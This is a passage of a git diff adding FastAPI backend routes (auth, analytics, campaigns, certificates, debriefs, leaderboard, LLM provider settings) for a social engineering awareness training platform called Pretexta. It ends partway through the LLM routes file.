(security) +] +ignore = [ + "S105", # hardcoded-password-string (we handle this via env vars) + "S106", # hardcoded-password-func-arg + "B008", # function-call-in-default-argument (FastAPI Depends pattern) + "B904", # raise-without-from-inside-except (FastAPI HTTPException pattern) + "S110", # try-except-pass (intentional silent fallback in model detection) +] + +[tool.ruff.lint.per-file-ignores] +"scripts/*" = ["S"] # Allow security warnings in utility scripts + +[tool.ruff.format] +quote-style = "double" +indent-style = "space" + +[tool.pytest.ini_options] +testpaths = ["tests"] +asyncio_mode = "auto" diff --git a/backend/requirements.txt b/backend/requirements.txt index 709a536..cc8a36e 100644 --- a/backend/requirements.txt +++ b/backend/requirements.txt @@ -19,3 +19,7 @@ langchain-groq # Utilities PyYAML +httpx + +# Development +ruff diff --git a/backend/routes/__init__.py b/backend/routes/__init__.py new file mode 100644 index 0000000..cf35ace --- /dev/null +++ b/backend/routes/__init__.py @@ -0,0 +1,39 @@ +from routes.adaptive import router as adaptive_router +from routes.analytics import router as analytics_router +from routes.auth import router as auth_router +from routes.campaigns import router as campaigns_router +from routes.certificates import router as certificates_router +from routes.challenges import router as challenges_router +from routes.debrief import router as debrief_router +from routes.imports import router as imports_router +from routes.leaderboard import router as leaderboard_router +from routes.llm import router as llm_router +from routes.notifications import router as notifications_router +from routes.organizations import router as organizations_router +from routes.quizzes import router as quizzes_router +from routes.reports import router as reports_router +from routes.scenario_builder import router as scenario_builder_router +from routes.settings import router as settings_router +from routes.simulations import router as simulations_router +from routes.webhooks import router as webhooks_router + +__all__ = [ + "auth_router", + "challenges_router", + "quizzes_router", + "simulations_router", + "llm_router", + "settings_router", + "imports_router", + "reports_router", + "leaderboard_router", + "analytics_router", + "organizations_router", + "campaigns_router", + "notifications_router", + "webhooks_router", + "scenario_builder_router", + "debrief_router", + "certificates_router", + "adaptive_router", +] diff --git a/backend/routes/adaptive.py b/backend/routes/adaptive.py new file mode 100644 index 0000000..f0b47c3 --- /dev/null +++ b/backend/routes/adaptive.py @@ -0,0 +1,28 @@ +from fastapi import APIRouter, Depends + +from models.schemas import User +from services.adaptive import ( + get_adaptive_persona_params, + get_recommended_categories, + get_recommended_difficulty, +) +from services.auth import get_current_user + +router = APIRouter(prefix="/adaptive", tags=["adaptive"]) + + +@router.get("/difficulty") +async def get_difficulty_recommendation(current_user: User = Depends(get_current_user)): + """Get recommended difficulty for current user.""" + difficulty = await get_recommended_difficulty(current_user.id) + categories = await get_recommended_categories(current_user.id) + return { + "recommended_difficulty": difficulty, + "weak_categories": categories, + } + + +@router.get("/persona-params") +async def get_persona_params(current_user: User = Depends(get_current_user)): + """Get adaptive AI persona parameters based on user skill level.""" + return await get_adaptive_persona_params(current_user.id) diff --git a/backend/routes/analytics.py b/backend/routes/analytics.py new file mode 100644 index 0000000..4cfa312 --- /dev/null +++ b/backend/routes/analytics.py @@ -0,0 +1,167 @@ +from fastapi import APIRouter, Depends + +from models.schemas import User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/analytics", tags=["analytics"]) + + +@router.get("/personal") +async def get_personal_analytics(current_user: User = Depends(get_current_user)): + """Get personal analytics for the current user.""" + sims = await db.simulations.find( + {"user_id": current_user.id, "status": "completed"}, {"_id": 0} + ).to_list(1000) + + if not sims: + return { + "total_simulations": 0, + "avg_score": 0, + "category_breakdown": {}, + "difficulty_breakdown": {}, + "score_over_time": [], + "cialdini_radar": {}, + "type_distribution": {}, + "improvement_rate": 0, + } + + # Average score + scores = [s.get("score", 0) for s in sims if s.get("score") is not None] + avg_score = sum(scores) / len(scores) if scores else 0 + + # Category breakdown (Cialdini) + cialdini_scores = {} + cialdini_counts = {} + for sim in sims: + categories = sim.get("challenge_data", {}).get("cialdini_categories", []) + score = sim.get("score", 0) or 0 + for cat in categories: + cialdini_scores.setdefault(cat, []).append(score) + cialdini_counts[cat] = cialdini_counts.get(cat, 0) + 1 + + cialdini_radar = {} + for cat, cat_scores in cialdini_scores.items(): + cialdini_radar[cat] = round(sum(cat_scores) / len(cat_scores), 1) if cat_scores else 0 + + # Difficulty breakdown + difficulty_counts = {} + difficulty_scores = {} + for sim in sims: + diff = sim.get("difficulty", "medium") + difficulty_counts[diff] = difficulty_counts.get(diff, 0) + 1 + score = sim.get("score", 0) or 0 + difficulty_scores.setdefault(diff, []).append(score) + + difficulty_breakdown = {} + for diff, d_scores in difficulty_scores.items(): + difficulty_breakdown[diff] = { + "count": difficulty_counts.get(diff, 0), + "avg_score": round(sum(d_scores) / len(d_scores), 1) if d_scores else 0, + } + + # Score over time + score_over_time = [] + for sim in sorted(sims, key=lambda s: s.get("started_at", "")): + score_over_time.append( + { + "date": sim.get("completed_at", sim.get("started_at", "")), + "score": sim.get("score", 0) or 0, + "type": sim.get("simulation_type", "unknown"), + "title": sim.get("title", "Untitled"), + } + ) + + # Type distribution + type_dist = {} + for sim in sims: + sim_type = sim.get("simulation_type", "unknown") + type_dist[sim_type] = type_dist.get(sim_type, 0) + 1 + + # Improvement rate (compare first half vs second half) + improvement_rate = 0 + if len(scores) >= 4: + mid = len(scores) // 2 + first_half_avg = sum(scores[:mid]) / mid + second_half_avg = sum(scores[mid:]) / (len(scores) - mid) + improvement_rate = round(second_half_avg - first_half_avg, 1) + + return { + "total_simulations": len(sims), + "avg_score": round(avg_score, 1), + "category_breakdown": cialdini_counts, + "difficulty_breakdown": difficulty_breakdown, + "score_over_time": score_over_time, + "cialdini_radar": cialdini_radar, + "type_distribution": type_dist, + "improvement_rate": improvement_rate, + } + + +@router.get("/team") +async def get_team_analytics(current_user: User = Depends(get_current_user)): + """Get team/organization analytics.""" + if not current_user.organization_id: + return {"error": "Not part of an organization"} + + org = await db.organizations.find_one({"id": current_user.organization_id}, {"_id": 0}) + if not org: + return {"error": "Organization not found"} + + member_ids = org.get("member_ids", []) + members = await db.users.find( + {"id": {"$in": member_ids}}, + {"_id": 0, "password_hash": 0}, + ).to_list(100) + + # Aggregate team stats + team_stats = [] + total_sims = 0 + total_score = 0 + total_scored_sims = 0 + weakest_categories = {} + + for member in members: + user_sims = await db.simulations.find( + {"user_id": member["id"], "status": "completed"}, {"_id": 0} + ).to_list(1000) + + user_scores = [s.get("score", 0) for s in user_sims if s.get("score") is not None] + user_avg = sum(user_scores) / len(user_scores) if user_scores else 0 + total_sims += len(user_sims) + total_score += sum(user_scores) + total_scored_sims += len(user_scores) + + # Track per-category scores + for sim in user_sims: + categories = sim.get("challenge_data", {}).get("cialdini_categories", []) + score = sim.get("score", 0) or 0 + for cat in categories: + weakest_categories.setdefault(cat, []).append(score) + + team_stats.append( + { + "user_id": member["id"], + "username": member.get("username", ""), + "display_name": member.get("display_name", ""), + "simulations_completed": len(user_sims), + "avg_score": round(user_avg, 1), + "level": member.get("level", 1), + } + ) + + # Find weakest areas + category_averages = {} + for cat, cat_scores in weakest_categories.items(): + category_averages[cat] = round(sum(cat_scores) / len(cat_scores), 1) + + team_avg = round(total_score / total_scored_sims, 1) if total_scored_sims > 0 else 0 + + return { + "organization": {"id": org["id"], "name": org["name"]}, + "total_members": len(members), + "total_simulations": total_sims, + "team_avg_score": team_avg, + "category_averages": category_averages, + "member_stats": sorted(team_stats, key=lambda x: x["avg_score"], reverse=True), + } diff --git a/backend/routes/auth.py b/backend/routes/auth.py new file mode 100644 index 0000000..e41ca5c --- /dev/null +++ b/backend/routes/auth.py @@ -0,0 +1,163 @@ +import re + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import ( + LoginRequest, + LoginResponse, + PasswordChangeRequest, + ProfileUpdateRequest, + RegisterRequest, + User, +) +from services.auth import create_token, get_current_user, hash_password, verify_password +from services.database import db +from services.gamification import award_xp + +router = APIRouter(prefix="/auth", tags=["auth"]) + +PASSWORD_MIN_LENGTH = 8 + + +def validate_password(password: str) -> str: + """Validate password complexity. Returns error message or empty string.""" + if len(password) < PASSWORD_MIN_LENGTH: + return f"Password must be at least {PASSWORD_MIN_LENGTH} characters" + if not re.search(r"[A-Z]", password): + return "Password must contain at least one uppercase letter" + if not re.search(r"[0-9]", password): + return "Password must contain at least one number" + return "" + + +@router.post("/register", response_model=LoginResponse) +async def register(request: RegisterRequest): + """Register a new user account.""" + # Check if username already exists + existing = await db.users.find_one({"username": request.username}) + if existing: + raise HTTPException(status_code=409, detail="Username already taken") + + # Validate password + pw_error = validate_password(request.password) + if pw_error: + raise HTTPException(status_code=400, detail=pw_error) + + # Check invite code if provided (for org joining) + organization_id = None + if request.invite_code: + org = await db.organizations.find_one({"invite_code": request.invite_code}) + if not org: + raise HTTPException(status_code=400, detail="Invalid invite code") + organization_id = org["id"] + + # Create user + user = User( + username=request.username, + password_hash=hash_password(request.password), + email=request.email, + display_name=request.display_name or request.username, + organization_id=organization_id, + ) + doc = user.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.users.insert_one(doc) + + # Add to organization if invite code + if organization_id: + await db.organizations.update_one( + {"id": organization_id}, + {"$addToSet": {"member_ids": user.id}}, + ) + + token = create_token(user.id) + return LoginResponse( + token=token, + user={ + "id": user.id, + "username": user.username, + "display_name": user.display_name, + "role": user.role, + "created_at": user.created_at.isoformat(), + }, + ) + + +@router.post("/login", response_model=LoginResponse) +async def login(request: LoginRequest): + user_doc = await db.users.find_one({"username": request.username}, {"_id": 0}) + + if not user_doc or not verify_password(request.password, user_doc["password_hash"]): + raise HTTPException(status_code=401, detail="Invalid credentials") + + user = User(**user_doc) + token = create_token(user.id) + + # Update last_active and check streak + await award_xp(user.id, 0, check_streak=True) + + return LoginResponse( + token=token, + user={ + "id": user.id, + "username": user.username, + "display_name": user.display_name, + "role": user.role, + "organization_id": user.organization_id, + "xp": user.xp, + "level": user.level, + "badges": user.badges, + "streak_days": user.streak_days, + "theme": user.theme, + "created_at": user.created_at.isoformat(), + }, + ) + + +@router.get("/me") +async def get_me(current_user: User = Depends(get_current_user)): + return { + "id": current_user.id, + "username": current_user.username, + "display_name": current_user.display_name, + "email": current_user.email, + "role": current_user.role, + "organization_id": current_user.organization_id, + "xp": current_user.xp, + "level": current_user.level, + "badges": current_user.badges, + "streak_days": current_user.streak_days, + "theme": current_user.theme, + "notifications_enabled": current_user.notifications_enabled, + "created_at": current_user.created_at.isoformat(), + } + + +@router.put("/profile") +async def update_profile( + updates: ProfileUpdateRequest, current_user: User = Depends(get_current_user) +): + """Update user profile.""" + update_data = {k: v for k, v in updates.model_dump().items() if v is not None} + if not update_data: + raise HTTPException(status_code=400, detail="No fields to update") + + await db.users.update_one({"id": current_user.id}, {"$set": update_data}) + return {"message": "Profile updated"} + + +@router.post("/change-password") +async def change_password( + request: PasswordChangeRequest, current_user: User = Depends(get_current_user) +): + """Change user password.""" + if not verify_password(request.current_password, current_user.password_hash): + raise HTTPException(status_code=400, detail="Current password is incorrect") + + pw_error = validate_password(request.new_password) + if pw_error: + raise HTTPException(status_code=400, detail=pw_error) + + new_hash = hash_password(request.new_password) + await db.users.update_one({"id": current_user.id}, {"$set": {"password_hash": new_hash}}) + return {"message": "Password changed successfully"} diff --git a/backend/routes/campaigns.py b/backend/routes/campaigns.py new file mode 100644 index 0000000..a1010bb --- /dev/null +++ b/backend/routes/campaigns.py @@ -0,0 +1,146 @@ +from datetime import UTC, datetime +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Campaign, CampaignProgress, User +from services.auth import get_current_user +from services.database import db +from services.gamification import award_xp + +router = APIRouter(prefix="/campaigns", tags=["campaigns"]) + + +@router.get("") +async def get_campaigns(current_user: User = Depends(get_current_user)): + """List all published campaigns.""" + campaigns = await db.campaigns.find({"is_published": True}, {"_id": 0}).to_list(100) + return campaigns + + +@router.get("/{campaign_id}") +async def get_campaign(campaign_id: str, current_user: User = Depends(get_current_user)): + """Get campaign details with user progress.""" + campaign = await db.campaigns.find_one({"id": campaign_id}, {"_id": 0}) + if not campaign: + raise HTTPException(status_code=404, detail="Campaign not found") + + progress = await db.campaign_progress.find_one( + {"campaign_id": campaign_id, "user_id": current_user.id}, {"_id": 0} + ) + + return {"campaign": campaign, "progress": progress} + + +@router.post("") +async def create_campaign(data: dict[str, Any], current_user: User = Depends(get_current_user)): + """Create a new campaign (admin/instructor only).""" + if current_user.role not in ("admin", "instructor"): + raise HTTPException(status_code=403, detail="Insufficient permissions") + + campaign = Campaign( + title=data["title"], + description=data.get("description", ""), + difficulty=data.get("difficulty", "medium"), + stages=data.get("stages", []), + cialdini_categories=data.get("cialdini_categories", []), + estimated_time=data.get("estimated_time", 30), + created_by=current_user.id, + is_published=data.get("is_published", False), + ) + doc = campaign.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.campaigns.insert_one(doc) + return {"id": campaign.id, "message": "Campaign created"} + + +@router.post("/{campaign_id}/start") +async def start_campaign(campaign_id: str, current_user: User = Depends(get_current_user)): + """Start a campaign.""" + campaign = await db.campaigns.find_one({"id": campaign_id}, {"_id": 0}) + if not campaign: + raise HTTPException(status_code=404, detail="Campaign not found") + + # Check if already in progress + existing = await db.campaign_progress.find_one( + {"campaign_id": campaign_id, "user_id": current_user.id, "status": "in_progress"} + ) + if existing: + return {"progress_id": existing["id"], "message": "Campaign already in progress"} + + progress = CampaignProgress( + campaign_id=campaign_id, + user_id=current_user.id, + ) + doc = progress.model_dump() + doc["started_at"] = doc["started_at"].isoformat() + await db.campaign_progress.insert_one(doc) + + return {"progress_id": progress.id, "message": "Campaign started", "first_stage": 0} + + +@router.post("/{campaign_id}/stage/{stage_index}/complete") +async def complete_stage( + campaign_id: str, + stage_index: int, + result: dict[str, Any], + current_user: User = Depends(get_current_user), +): + """Complete a campaign stage.""" + progress = await db.campaign_progress.find_one( + {"campaign_id": campaign_id, "user_id": current_user.id, "status": "in_progress"}, + {"_id": 0}, + ) + if not progress: + raise HTTPException(status_code=404, detail="No active campaign progress") + + campaign = await db.campaigns.find_one({"id": campaign_id}, {"_id": 0}) + if not campaign: + raise HTTPException(status_code=404, detail="Campaign not found") + + # Add stage result + stage_result = { + "stage_index": stage_index, + "score": result.get("score", 0), + "completed_at": datetime.now(UTC).isoformat(), + "events": result.get("events", []), + } + + stage_results = progress.get("stage_results", []) + stage_results.append(stage_result) + + # Check if campaign is complete + total_stages = len(campaign.get("stages", [])) + next_stage = stage_index + 1 + is_complete = next_stage >= total_stages + + updates = { + "stage_results": stage_results, + "current_stage": next_stage, + } + + if is_complete: + updates["status"] = "completed" + updates["completed_at"] = datetime.now(UTC).isoformat() + # Calculate overall score + all_scores = [r.get("score", 0) for r in stage_results] + updates["overall_score"] = round(sum(all_scores) / len(all_scores), 1) if all_scores else 0 + + # Award XP for campaign completion + xp_earned = 100 + (updates["overall_score"] // 10) * 10 + await award_xp(current_user.id, int(xp_earned)) + else: + # Award XP per stage + await award_xp(current_user.id, 25) + + await db.campaign_progress.update_one( + {"id": progress["id"]}, + {"$set": updates}, + ) + + return { + "message": "Stage completed" if not is_complete else "Campaign completed!", + "next_stage": next_stage if not is_complete else None, + "is_complete": is_complete, + "overall_score": updates.get("overall_score"), + } diff --git a/backend/routes/certificates.py b/backend/routes/certificates.py new file mode 100644 index 0000000..41806c0 --- /dev/null +++ b/backend/routes/certificates.py @@ -0,0 +1,97 @@ +from datetime import UTC, datetime + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/certificates", tags=["certificates"]) + + +@router.get("/{simulation_id}") +async def get_certificate_data(simulation_id: str, current_user: User = Depends(get_current_user)): + """Generate certificate data for a completed simulation.""" + sim = await db.simulations.find_one({"id": simulation_id, "status": "completed"}, {"_id": 0}) + if not sim: + raise HTTPException(status_code=404, detail="Completed simulation not found") + + score = sim.get("score", 0) or 0 + if score < 70: + raise HTTPException(status_code=400, detail="Certificate requires a minimum score of 70%") + + # Determine certification level + if score >= 95: + cert_level = "Platinum" + elif score >= 85: + cert_level = "Gold" + elif score >= 70: + cert_level = "Silver" + else: + cert_level = "Bronze" + + certificate = { + "certificate_id": f"CERT-{simulation_id[:8].upper()}", + "recipient": { + "name": current_user.display_name or current_user.username, + "username": current_user.username, + }, + "simulation": { + "title": sim.get("title", "Social Engineering Awareness"), + "type": sim.get("simulation_type", "simulation"), + "difficulty": sim.get("difficulty", "medium"), + "score": score, + }, + "certification": { + "level": cert_level, + "title": "Social Engineering Awareness", + "description": ( + f"Has demonstrated {cert_level.lower()}-level " + f"proficiency in identifying and defending " + f"against social engineering attacks." + ), + }, + "issued_at": datetime.now(UTC).isoformat(), + "issuer": "Pretexta - Social Engineering Simulation Lab", + "verification_url": f"/verify/{simulation_id[:8].upper()}", + } + + return certificate + + +@router.get("/user/all") +async def get_user_certificates(current_user: User = Depends(get_current_user)): + """Get all certificates for the current user.""" + sims = await db.simulations.find( + { + "user_id": current_user.id, + "status": "completed", + "score": {"$gte": 70}, + }, + {"_id": 0}, + ).to_list(100) + + certificates = [] + for sim in sims: + score = sim.get("score", 0) or 0 + if score >= 95: + level = "Platinum" + elif score >= 85: + level = "Gold" + elif score >= 70: + level = "Silver" + else: + continue + + certificates.append( + { + "certificate_id": f"CERT-{sim['id'][:8].upper()}", + "simulation_id": sim["id"], + "title": sim.get("title", "Social Engineering Awareness"), + "score": score, + "level": level, + "completed_at": sim.get("completed_at", sim.get("started_at")), + } + ) + + return certificates diff --git a/backend/routes/challenges.py b/backend/routes/challenges.py new file mode 100644 index 0000000..2c9cfa2 --- /dev/null +++ b/backend/routes/challenges.py @@ -0,0 +1,29 @@ +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Challenge, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/challenges", tags=["challenges"]) + + +@router.get("", response_model=list[Challenge]) +async def get_challenges(current_user: User = Depends(get_current_user)): + challenges = await db.challenges.find({}, {"_id": 0}).to_list(1000) + return challenges + + +@router.get("/{challenge_id}", response_model=Challenge) +async def get_challenge(challenge_id: str, current_user: User = Depends(get_current_user)): + challenge = await db.challenges.find_one({"id": challenge_id}, {"_id": 0}) + if not challenge: + raise HTTPException(status_code=404, detail="Challenge not found") + return challenge + + +@router.post("", response_model=Challenge) +async def create_challenge(challenge: Challenge, current_user: User = Depends(get_current_user)): + doc = challenge.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.challenges.insert_one(doc) + return challenge diff --git a/backend/routes/debrief.py b/backend/routes/debrief.py new file mode 100644 index 0000000..9450fc1 --- /dev/null +++ b/backend/routes/debrief.py @@ -0,0 +1,196 @@ +import logging +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import User +from services.auth import get_current_user +from services.database import db +from services.llm import get_llm_generate_model + +logger = logging.getLogger(__name__) + +router = APIRouter(prefix="/debrief", tags=["debrief"]) + +CIALDINI_DESCRIPTIONS = { + "reciprocity": ( + "The attacker gave you something (a favor, information) to create a sense of obligation." + ), + "scarcity": ( + "Urgency or limited availability was used to pressure you into acting without thinking." + ), + "authority": ( + "The attacker impersonated someone in a position of power to override your judgment." + ), + "commitment": ("Small initial compliance was used to build toward larger, riskier requests."), + "liking": ("The attacker built rapport or familiarity to lower your defenses."), + "social_proof": ("References to what 'others are doing' were used to normalize the request."), +} + + +@router.get("/{simulation_id}") +async def get_debrief(simulation_id: str, current_user: User = Depends(get_current_user)): + """Get or generate post-simulation debrief analysis.""" + sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) + if not sim: + raise HTTPException(status_code=404, detail="Simulation not found") + + # Return cached debrief if exists + if sim.get("debrief"): + return sim["debrief"] + + # Generate debrief + debrief = await _generate_debrief(sim) + + # Cache it + await db.simulations.update_one( + {"id": simulation_id}, + {"$set": {"debrief": debrief}}, + ) + + return debrief + + +async def _generate_debrief(sim: dict[str, Any]) -> dict[str, Any]: + """Generate a detailed debrief analysis.""" + events = sim.get("events", []) + score = sim.get("score", 0) or 0 + categories = sim.get("challenge_data", {}).get("cialdini_categories", []) + + # Key moments analysis + key_moments = [] + for i, event in enumerate(events): + if event.get("action") in ("complied", "clicked", "shared_info", "refused", "reported"): + key_moments.append( + { + "index": i, + "action": event.get("action"), + "was_correct": event.get("action") in ("refused", "reported"), + "description": event.get("description", ""), + "tip": _get_tip_for_action(event.get("action", "")), + } + ) + + # Cialdini analysis + cialdini_analysis = [] + for cat in categories: + cialdini_analysis.append( + { + "principle": cat, + "description": CIALDINI_DESCRIPTIONS.get(cat, ""), + "was_used": True, + } + ) + + # Performance rating + if score >= 90: + rating = "excellent" + summary = ( + "You demonstrated strong awareness and successfully identified the attack vectors." + ) + elif score >= 70: + rating = "good" + summary = "Good performance. You caught most red flags but had some vulnerable moments." + elif score >= 50: + rating = "fair" + summary = ( + "Mixed results. You fell for some manipulation " + "techniques. Review the key moments below." + ) + else: + rating = "needs_improvement" + summary = ( + "The attacker was able to exploit psychological " + "vulnerabilities. Focus on the tips below." + ) + + # Recommendations + recommendations = [] + if score < 70: + recommendations.append( + "Always verify identity through a separate, " + "trusted channel before complying with requests." + ) + if "authority" in categories: + recommendations.append( + "Question authority-based requests. Legitimate " + "leaders rarely bypass established procedures." + ) + if "scarcity" in categories: + recommendations.append( + "Be suspicious of artificial urgency. Take time to verify before acting." + ) + if "reciprocity" in categories: + recommendations.append( + "Unsolicited favors may be manipulation. Don't feel obligated to reciprocate." + ) + if score >= 80: + recommendations.append("Great defense! Try harder difficulty scenarios to keep improving.") + + return { + "simulation_id": sim.get("id"), + "title": sim.get("title", "Untitled"), + "score": score, + "rating": rating, + "summary": summary, + "cialdini_analysis": cialdini_analysis, + "key_moments": key_moments, + "recommendations": recommendations, + "total_events": len(events), + "correct_actions": sum(1 for m in key_moments if m.get("was_correct")), + "incorrect_actions": sum(1 for m in key_moments if not m.get("was_correct")), + } + + +def _get_tip_for_action(action: str) -> str: + tips = { + "complied": ( + "You complied with a suspicious request. Always verify through official channels." + ), + "clicked": ( + "You clicked a potentially malicious link. Hover over links to check URLs first." + ), + "shared_info": ( + "You shared sensitive information. Never share credentials over unverified channels." + ), + "refused": ("Good call! Refusing suspicious requests is the right approach."), + "reported": ( + "Excellent! Reporting suspicious activity helps protect the entire organization." + ), + } + return tips.get(action, "") + + +@router.post("/{simulation_id}/ai-analysis") +async def get_ai_debrief(simulation_id: str, current_user: User = Depends(get_current_user)): + """Generate AI-powered deep analysis of a simulation (requires LLM config).""" + sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) + if not sim: + raise HTTPException(status_code=404, detail="Simulation not found") + + config = await db.llm_configs.find_one({"enabled": True}, {"_id": 0}) + if not config: + raise HTTPException(status_code=400, detail="LLM not configured") + + prompt = f"""Analyze this social engineering simulation result and provide educational feedback. + +Simulation: {sim.get("title", "Unknown")} +Score: {sim.get("score", 0)} +Type: {sim.get("simulation_type", "unknown")} +Events: {sim.get("events", [])} + +Provide: +1. What manipulation techniques were used +2. Where the user was most vulnerable +3. Specific, actionable tips for improvement +4. A psychological explanation of why these techniques work + +Keep it educational. Format as JSON with keys: +techniques, vulnerabilities, tips, psychology.""" + + try: + response = await get_llm_generate_model(config, prompt, {}) + return {"ai_analysis": response.content, "simulation_id": simulation_id} + except Exception as e: + logger.error(f"AI debrief failed: {e}") + raise HTTPException(status_code=500, detail="AI analysis failed") diff --git a/backend/routes/imports.py b/backend/routes/imports.py new file mode 100644 index 0000000..8392ca3 --- /dev/null +++ b/backend/routes/imports.py @@ -0,0 +1,41 @@ +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Challenge, Quiz, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/import", tags=["import"]) + + +@router.post("/yaml") +async def import_yaml_file( + file_content: dict[str, Any], current_user: User = Depends(get_current_user) +): + """Import YAML challenge or quiz.""" + try: + yaml_type = file_content.get("type") + data = file_content.get("data") + + if yaml_type == "challenge": + challenge = Challenge(**data) + doc = challenge.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.challenges.insert_one(doc) + return {"message": "Challenge imported", "id": challenge.id} + + elif yaml_type == "quiz": + quiz = Quiz(**data) + doc = quiz.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.quizzes.insert_one(doc) + return {"message": "Quiz imported", "id": quiz.id} + + else: + raise HTTPException(status_code=400, detail="Unknown YAML type") + + except HTTPException: + raise + except Exception as e: + raise HTTPException(status_code=400, detail=f"Import failed: {str(e)}") diff --git a/backend/routes/leaderboard.py b/backend/routes/leaderboard.py new file mode 100644 index 0000000..42ccb61 --- /dev/null +++ b/backend/routes/leaderboard.py @@ -0,0 +1,89 @@ +from fastapi import APIRouter, Depends, Query + +from models.schemas import User +from services.auth import get_current_user +from services.database import db +from services.gamification import BADGE_DEFINITIONS, xp_for_next_level + +router = APIRouter(prefix="/leaderboard", tags=["leaderboard"]) + + +@router.get("") +async def get_leaderboard( + scope: str = Query("global", regex="^(global|organization)$"), + limit: int = Query(50, le=100), + current_user: User = Depends(get_current_user), +): + """Get leaderboard rankings.""" + query = {} + if scope == "organization" and current_user.organization_id: + query["organization_id"] = current_user.organization_id + + users = ( + await db.users.find( + query, + {"_id": 0, "password_hash": 0}, + ) + .sort("xp", -1) + .to_list(limit) + ) + + leaderboard = [] + for rank, user in enumerate(users, 1): + # Count completed simulations + sim_count = await db.simulations.count_documents( + {"user_id": user["id"], "status": "completed"} + ) + + leaderboard.append( + { + "rank": rank, + "user_id": user["id"], + "username": user.get("username", ""), + "display_name": user.get("display_name", user.get("username", "")), + "xp": user.get("xp", 0), + "level": user.get("level", 1), + "badges_count": len(user.get("badges", [])), + "streak_days": user.get("streak_days", 0), + "simulations_completed": sim_count, + "is_current_user": user["id"] == current_user.id, + } + ) + + return leaderboard + + +@router.get("/me") +async def get_my_rank(current_user: User = Depends(get_current_user)): + """Get current user's rank and XP progress.""" + # Count users with more XP + higher_xp_count = await db.users.count_documents({"xp": {"$gt": current_user.xp}}) + rank = higher_xp_count + 1 + total_users = await db.users.count_documents({}) + + sim_count = await db.simulations.count_documents( + {"user_id": current_user.id, "status": "completed"} + ) + + return { + "rank": rank, + "total_users": total_users, + "xp_progress": xp_for_next_level(current_user.xp), + "badges": current_user.badges, + "streak_days": current_user.streak_days, + "simulations_completed": sim_count, + } + + +@router.get("/badges") +async def get_all_badges(current_user: User = Depends(get_current_user)): + """Get all available badges with earned status.""" + result = [] + for badge in BADGE_DEFINITIONS: + result.append( + { + **badge, + "earned": badge["id"] in current_user.badges, + } + ) + return result diff --git a/backend/routes/llm.py b/backend/routes/llm.py new file mode 100644 index 0000000..03d7bd2 --- /dev/null +++ b/backend/routes/llm.py @@ -0,0 +1,307 @@ +import logging +from datetime import UTC, datetime +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException, Query +from langchain_core.messages import AIMessage, HumanMessage, SystemMessage + +from models.schemas import LLMConfig, User +from services.auth import get_current_user +from services.database import db +from services.llm import ( + LOCAL_DEFAULTS, + PROVIDER_MODELS, + fetch_local_models, + fetch_openrouter_models, + get_llm_chat_model, + get_llm_generate_model, + get_provider_models, + repair_json, +) + +logger = logging.getLogger(__name__) + +router = APIRouter(prefix="/llm", tags=["llm"]) + +# ==================== PROVIDER & MODEL INFO ==================== + +PROVIDER_INFO = { + "groq": { + "name": "Groq", + "description": "Ultra-fast inference. Free tier available. Best for quick responses.", + "auth": "api_key", + "signup_url": "https://console.groq.com", + "placeholder": "gsk_...", + }, + "gemini": { + "name": "Google Gemini", + "description": "Google's multimodal AI. Free tier with generous limits.", + "auth": "api_key", + "signup_url": "https://aistudio.google.com/apikey", + "placeholder": "AIza...", + }, + "claude": { + "name": "Anthropic Claude", + "description": "Advanced reasoning and safety. Paid API.", + "auth": "api_key", + "signup_url": "https://console.anthropic.com", + "placeholder": "sk-ant-...", + }, + "openai": { + "name": "OpenAI", + "description": "GPT-4o and GPT-3.5. Industry standard. Paid API.", + "auth": "api_key", + "signup_url": "https://platform.openai.com/api-keys", + "placeholder": "sk-...", + }, + "openrouter": { + "name": "OpenRouter", + "description": "Access 200+ models from one API key. Free models available. Best value.", + "auth": "api_key", + "signup_url": "https://openrouter.ai/keys", + "placeholder": "sk-or-v1-...", + "recommended": True, + }, + "local": { + "name": "Local LLM", + "description": ( + "Connect to Ollama, LM Studio, llama.cpp, or any " + "OpenAI-compatible local server. No API key needed." + ), + "auth": "base_url", + "placeholder": "http://localhost:11434/v1", + "presets": LOCAL_DEFAULTS, + }, +} + + +@router.get("/providers") +async def get_providers(current_user: User = Depends(get_current_user)): + """List all supported LLM providers with info.""" + return PROVIDER_INFO + + +@router.get("/models/{provider}") +async def get_models_for_provider( + provider: str, + current_user: User = Depends(get_current_user), +): + """Get available models for a provider.""" + if provider == "local": + # Try to fetch from configured local endpoint + config = await db.llm_configs.find_one({"provider": "local"}, {"_id": 0}) + default_url = LOCAL_DEFAULTS["ollama"] + base_url = config.get("base_url", default_url) if config else default_url + models = await fetch_local_models(base_url) + if models: + return {"provider": provider, "models": models, "source": "live"} + # Fallback: return empty with instruction + return { + "provider": provider, + "models": [], + "source": "none", + "message": "No local server detected. Start Ollama or LM Studio first.", + } + + if provider == "openrouter": + # Try to fetch live model list + config = await db.llm_configs.find_one({"provider": "openrouter"}, {"_id": 0}) + api_key = config.get("api_key", "") if config else "" + models = await fetch_openrouter_models(api_key) + if models: + return { + "provider": provider, + "models": models[:100], + "source": "live", + "total": len(models), + } + # Fallback to static catalog + return { + "provider": provider, + "models": PROVIDER_MODELS.get("openrouter", []), + "source": "static", + } + + # Static catalog for all other providers + models = get_provider_models(provider) + if not models: + raise HTTPException(status_code=404, detail=f"Unknown provider: {provider}") + return {"provider": provider, "models": models, "source": "static"} + + +@router.get("/models/{provider}/refresh") +async def refresh_models( + provider: str, + base_url: str = Query(None), + current_user: User = Depends(get_current_user), +): + """Force refresh model list (for 